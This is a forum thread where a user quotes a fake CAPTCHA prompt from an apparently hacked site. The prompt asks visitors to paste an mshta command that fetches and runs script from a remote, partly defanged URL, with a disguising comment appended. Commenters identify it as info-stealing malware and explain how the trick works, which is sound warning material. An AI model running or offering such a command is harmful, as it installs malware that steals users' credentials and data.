The text it wants me to run is the following:
mshta https://check/[dot]dasoc[dot]icu/gkcxv[dot]google?i=888x8x8x-x8xx-8888-xxx8-a00888888a1ab # Humаn, nоt а rоbоt: CAPTCHА Vеrіfісаtіоn ID: 552163’’
Looks like the site got hacked and wants be run malware, but I’ve never seen something like this before.
You must log in or register to comment.
Definitely malware, as everyone has already said.
DO NOT FOLLOW THESE PROMPTS. This is a malicious prompt. It places malicious content in your clipboard, and requesting that you paste it into command prompt or powershell, which will infect you.
I know, but I like having the hackers on my computer, I just like the Idea that someone is paying attention to me and likes the same thing I do.
You’re making the local FBI field office jealous. Lol
That’s definitely trying to hack you.
From the instructions, I would say they are trying to convince them to hack themselves (and yes, I know, that’s how 95% of hacking works… But is that only me, or this one is so obvious that it hurts?)
The “This is either phishing or a prank, in either case, fucking don’t” type Captcha
Yeah, doesn’t mshta run JavaScript locally on Windows? This looks like a way to force you to run their script
I hope that URL isn’t the real one, you don’t want anyone trying it just to see what would happen
It’s bad that this scam is running of course but, I have to say this particular scam has almost a nostalgic quality to it. It reminds me of the type of trickery that old school malware back in the day used to rely on to get on to people’s computers. It’s kind of quaint how unsophisticated it is and how much active work it requires of the victim to successfully infect them.
Lol this looks lile an April Fools prank.
Ctrl + V is paste, and most browsers do not require permission for the website to copy something into your clipboard (as opposed to pasting from your clipboard).
So a paste would just input code for your OS to run. Sus. Its obviously either malware or a prank.
It checks if you’re both human AND not a bumbling tumbleweed.
“A way out west there was this fella, fella I want to tell you about, fella by the name of Jeff Lebowski. At least, that was the handle his lovin’ parents gave him, but he never had much use for it himself. This Lebowski, he called himself the Dude. Now, Dude, that’s a name no one would self-apply where I come from. But then, there was a lot about the Dude that didn’t make a whole lot of sense to me. And a lot about where he lived, like-wise. But then again, maybe that’s why I found the place s’durned innarestin’.”
Highly sophisticated Darwinian CAPTCHA
Which website gave you those instructions? Name and shame.
I saw a post on this like 6 months ago. It was called a lumma stealer
It’s called the ‘John Hammond attack’. Even though it existed before he added his 2 cents, what you see in your image is his addition.
Watch his video to see him explain it.
Well, if it was a Richard Hammond attack, it would probably crash itself.
At 200mph
And have it’s teeth whitened
before he added his 2 cents
He spared no expense, huh.
Nice trick to feed your computer with a virus.
Yea good thing you didn’t. MSHTA is the app that lets you run Microsoft HTML Apps (usually used for their help articles). Those can contain JavaScript or VBScript code. And since you’re pasting it in a Run box it’ll happily execute it, even if it’s a remote source.
Generally it would only run as your user (you’re not admin are you?), which would still be enough to make your life miserable, but it could also try to run known exploits and raise itself to admin and own your whole computer.
Why wouldn’t a windows user be running as admin lol its windows. That said most of what you value is already in your user account anyway and privilege escalations are hardly unknown as well.
It absolutely is malware. The Text you see is a comment appended to the end of a command that’ll download malicious software. The comment is placed in such a way that the command is out of frame.
Meanwhile me on linux be like :
